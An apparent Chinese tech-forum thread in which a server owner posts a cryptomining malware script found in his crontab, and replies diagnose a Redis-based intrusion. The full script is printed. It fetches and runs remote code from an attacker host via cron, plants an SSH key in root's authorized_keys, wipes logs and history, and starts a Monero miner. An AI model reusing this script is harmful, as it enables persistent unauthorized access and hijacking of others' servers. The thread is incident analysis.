系统 centos7
今天看到服务器报警 68%的 cpu 被用。我也没干嘛啊。 用 htop 看到如下:
很浪啊,赶紧 kill -9 杀掉进程,单一下子就有起来了。 灵光一闪,查看 crontab,如图: 用 crontab 里的链接下载了这个 sh:
#!/bin/bash ps -ef | grep crypto-pool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep nanopool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep supportxmr | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep minexmr | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep dwarfpool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep xmrpool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep moneropool | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep xmr | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep monero | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep udevs | grep -v grep | awk '{print $2}' | xargs kill -9 ps -ef | grep kworkers | grep -v grep | awk '{print $2}' | xargs kill -9 skill -KILL udevs skill -KILL kworkers rm -rf /var/lib/apt/lists/* apt-get update apt-get install wget -y apt-get install libcurl4-openssl-dev -y apt-get install python-pip -y apt-get install ca-certificates -y apt-get install redis-tools -y apt-get install python gcc -y apt-get install python-setuptools python-dev build-essential -y --allow-unauthenticated yum -y install epel-release yum -y install wget gcc redis git python-pip ca-certificates echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/root echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/root mkdir -p /var/spool/cron/crontabs mkdir -p /root/.ssh/ echo "0 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh" > /var/spool/cron/crontabs/root echo "0 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh" >> /var/spool/cron/crontabs/root echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys PS3=$(iptables -L | grep 6379 | wc -l) if [ $PS3 -eq 0 ]; then yum -y install iptables-services iptables -I INPUT 1 -p tcp --dport 6379 -j DROP iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT service iptables save /etc/init.d/iptables-persistent save fi echo "" > /var/log/wtmp echo "" > /var/log/secure history -c if [ ! -f "/tmp/migrations" ];then wget https://transfer.sh/SstPD/clay --no-check-certificate -O /tmp/clay && chmod +x /tmp/clay wget https://transfer.sh/q4oJN/nodexx --no-check-certificate -O /tmp/migrations && chmod 777 /tmp/migrations curl -sk https://transfer.sh/q4oJN/nodexx -o /tmp/migrations && chmod 777 /tmp/migrations fi cd /tmp PS1=$(ps aux | grep clay | grep -v "grep" | wc -l) if [ $PS1 -eq 0 ]; then /tmp/clay & fi PS2=$(ps aux | grep migrations | grep -v "grep" | wc -l) if [ $PS2 -eq 0 ]; then /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B fi if [ $? -ne 0 -a $PS2 -eq 0 ]; then wget https://transfer.sh/pQMdB/glibc-2.14.tar.gz --no-check-certificate -O /tmp/glibc-2.14.tar.gz && tar zxvf /tmp/glibc-2.14.tar.gz -C / && export LD_LIBRARY_PATH=/opt/glibc-2.14/lib:$LD_LIBRARY_PATH && /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B && echo "" > /var/log/wtmp && echo "" > /var/log/secure && history -c fi if [ $PS3 -eq 0 ]; then yum -y install iptables-services iptables -I INPUT 1 -p tcp --dport 6379 -j DROP iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT service iptables save /etc/init.d/iptables-persistent save fi
各位猜猜他是不是要挖矿。 我现在只是把外网用防火墙给卡断了,想仔细研究研究他到底在干嘛
1 dengshuang OP ![]() echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDV1VxPVZFUOOWZwMFVBwP/904lhAZNj2U5DPsZyIWw33jHeFRElM++XnUYmkMDiu8KuJXnFDJMkyXxsq77fOpDhVGOoexll3+P6SmZWViWwnhOgvxhccgT72J+LPZEIwPqPZQVHR4ksdVSnMVreyZs+rQ7O+L2xychpqzeIrk4Q/08f5XreOnq4Rgxp9oKwSlf7vKmQ7tUWUxfMHHL1wQYZPmdKpgSi/JmokLpp5cKAT7r0gGOj1jV8ZAJc+z45Ts2JBH9JYscHBssh7MBWWymcjXANd9a6XaQnbnl6nOFFNyYm8dBuLkGpEUNCdMq/jc5YLfnAnbGVbBMhuWzaWUp root@host-10-10-10-26" >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys 这一条很是邪恶啊 |
![]() | 2 henryshen233 2018-04-16 14:40:23 +08:00 @dengshuang 拽了 |
![]() | 3 henryshen233 2018-04-16 14:40:33 +08:00 我说一楼 |
4 u5f20u98de 2018-04-16 14:42:55 +08:00 ![]() 看样子的确是被拿来挖矿了,看命令是用了一个未授权访问的 redis 漏洞(因为替你把 6379 关上不让别人搞) |
5 hcymk2 2018-04-16 14:44:10 +08:00 ![]() xmr 门罗币 |
6 doun 2018-04-16 14:46:45 +08:00 via Android ![]() pool.zer0day.ru:8080 这个好像是挖矿的。找到漏洞了吗怎么被搞的? |
![]() | 7 raslan 2018-04-16 14:46:46 +08:00 被拿来挖矿了 |
![]() | 8 Felldeadbird 2018-04-16 14:49:12 +08:00 @u5f20u98de 良心黑产脚本? |
![]() | 9 murusu 2018-04-16 15:00:09 +08:00 ![]() 被人拿来当矿机了 很奇怪的是你这机子允许 root 帐号远程登录? |
10 bearqq 2018-04-16 15:01:11 +08:00 via Android Stratum 字样挖矿无疑 有可能是 ssh 密码破解搞进来的,别的弱密码也可能,1day 漏洞也可能看你更新不。 |
![]() | 11 jasonyang9 2018-04-16 15:02:27 +08:00 ![]() ``` /tmp/migrations -o stratum+tcp://pool.zer0day.ru:8080 --max-cpu-usage 85 -k -B ``` 还保留了 15%CPU 给你用,良心啊 |
12 hcymk2 2018-04-16 15:06:42 +08:00 echo "" > /var/log/wtmp echo "" > /var/log/secure history -c |
13 geagerg 2018-04-16 15:09:31 +08:00 ![]() 见过个类似的,看看是不是 redis 开了外网访问但是没设密码或者弱密码或或者配置文件有误未生效 |
14 dengshuang OP ![]() @murusu 不是这是内网的电脑,当时通过代理,把 6379 端口 redis 代理出去了。redis 是用 root 运行的。 |
15 dengshuang OP @jasonyang9 尴尬,哈哈 |
![]() | 16 EXE 2018-04-16 15:14:34 +08:00 ![]() 前几天服务器刚中了挖门罗币的病毒,而且用的还是 docker 来跑的。。。 |
18 u5f20u98de 2018-04-16 15:20:38 +08:00 @Felldeadbird 不是良心,是怕被别家黑客工具用了,竞争也很激烈啊。 |
![]() | 19 4ever911 2018-04-16 15:22:23 +08:00 我前几天配置的 SS 也被黑了用作 ddos,客服发 email 说关停了我的机器,我上去一看,几个小时打了 300G 流量。。。。。 也不知道是如何黑的,后来果断重新弄了一台,关了 root 远程登录,关闭密码登陆。 |
20 nicevar 2018-04-16 15:42:58 +08:00 估计是 ssh 被爆破进入的 |
![]() | 21 Rootcat 2018-04-16 15:44:15 +08:00 看了这个,我竟然想到的是拿我闲置的服务器来挖门罗币,不知道能挖多少。。。 |
![]() | 22 lopetver 2018-04-16 15:45:10 +08:00 |
![]() | 23 kongkongyzt 2018-04-16 15:47:11 +08:00 @dengshuang #1 +1, 刚想回这个, 这条 hhh |
![]() | 24 lopetver 2018-04-16 15:57:17 +08:00 @kongkongyzt 求解这条是什么意思 |
25 FindBoyFriend 2018-04-16 16:01:56 +08:00 一项喜欢用 keys 登陆 ssh,就差两步验证了 |
26 f2f2f 2018-04-16 16:13:32 +08:00 @jasonyang9 然而即便留了 15% 很多商家还是会直接把这样的 vps 给 suspend 了 #滑稽 |
29 dengshuang OP @lopetver 免密码 登陆 |
![]() | 30 airycanon 2018-04-16 16:53:54 +08:00 你是不是用 root 启动 redis 了并且对外网是开放的? |
![]() | 31 sdzwb 2018-04-16 16:56:48 +08:00 这是服务器被入侵,同时用于挖矿的步骤啊。 要杜绝还得找服务器漏洞的根源,然后再去堵。 |
![]() | 32 YMB 2018-04-16 17:10:16 +08:00 前段时间研究过 redis 漏洞,但新版本貌似怎么都不能生效,楼主 redis 版本是多少? 有可疑 key 之类的一些信息吗,有的话麻烦提供一下大家研究研究 |
![]() | 33 ZackB0T 2018-04-16 17:15:41 +08:00 via Android 最简单的方式,云墙 设置下 ssh 端口么? ip 或者 IP 段放行。 挖门罗的 打算挖的,给你个参考,G620 CentOS 核算力 50,如果支持 aes 能快不少。但是 cpu 自己挖电费回不来,矿池一般 0.3 提,这算力基本一年提不出来。 |
![]() | 34 YumeMichi 2018-04-16 18:21:36 +08:00 让我想起我司一台测试服务器上的 redis 没有设置密码 然后因为版本也不是最新的 就被人利用漏洞种过挖矿程序 |
![]() | 35 Miy4mori 2018-04-16 18:50:45 +08:00 @Felldeadbird 你怎么理解到良心的,明显怕后来人把自己蹬了啊。 |
![]() | 36 jeffson 2018-04-16 19:11:16 +08:00 stratum+tcp://pool.zer0day.ru:8080 必然是挖矿啊 |
![]() | 37 lusi1990 2018-04-16 19:28:29 +08:00 via Android 我也被黑锅,cpu 占用了 100% |
![]() | 38 DeWhite 2018-04-16 20:06:31 +08:00 @jasonyang9 我之前查日志菜发现 只被用了 50%,这不算良心 |
39 projectzoo 2018-04-16 23:03:32 +08:00 @dengshuang #1 有点意思,这个。。 |
![]() | 40 msg7086 2018-04-17 00:00:43 +08:00 无密码全球公开 root 账户运行的 redis,不拿来挖矿难道还留着过年? |
![]() | 41 defunct9 2018-04-17 06:16:19 +08:00 via iPhone 挖门罗币种的 开 ssh,让我上去也挖挖 |
![]() | 42 winglight2016 2018-04-17 10:59:30 +08:00 一般 VPS 都会禁止挖矿的 |
![]() | 43 henryshen233 2018-04-17 11:24:12 +08:00 @4ever911 上次我的 Linode 也流量暴涨,后来只开放必要端口就好了 |
44 xiayun 2018-04-17 16:09:33 +08:00 挖矿的,应该是利用 redis 端口漏洞进来的,因为 redis 默认是不用用户密码的 |
![]() | 45 infra 2018-04-19 08:38:37 +08:00 被偷挖挖门罗币了 |